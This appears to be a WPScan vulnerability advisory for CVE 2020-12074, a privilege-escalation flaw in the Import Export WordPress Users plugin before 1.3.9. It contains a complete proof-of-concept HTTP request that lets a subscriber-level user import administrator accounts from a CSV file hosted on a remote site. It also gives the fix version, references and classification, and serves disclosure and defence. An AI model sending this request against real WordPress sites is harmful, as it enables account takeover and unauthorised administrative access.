Import Export WordPress Users < 1.3.9 - Authenticated Arbitrary User Creation



Description
"The flaw allowed anybody with subscriber-level access or above to import new users via a CSV file, including administrative-level users" providing subscriber-level users and above with the ability to escalate their privileges. 
Proof of Concept
POST /wp-admin/admin-ajax.php?import_page=wordpress_hf_user_csv&step=3 HTTP/1.1
Host: EXAMPLE.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
Origin: http://EXAMPLE.com
Referer: http://EXAMPLE.com/wp-admin/admin.php?import=wordpress_hf_user_csv&step=2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: {SUB+ COOKIES}
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

action=user_csv_import_request&file=http://REMOTESITE.com/USERS.csv&start_pos=0&end_pos=

PoC video: https://www.youtube.com/watch?v=0ejJwbFJpcU

Affects Plugin

fixed in version 1.3.9

References

CVE 2020-12074
URL https://www.wordfence.com/blog/2020/03/vulnerability-patched-in-import-export-wordpress-users/
URL https://plugins.trac.wordpress.org/changeset/2252948/users-customers-import-export-for-wp-woocommerce

Classification

Type PRIVESC
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-269

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://www.wordfence.com/
Submitter Twitter infosecchloe
Views 1342
Verified No
WPVDB ID 10125

Timeline

Publicly Published 2020-03-11 (3 months ago)
Added 2020-03-11 (2 months ago)
Last Updated 2020-04-24 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin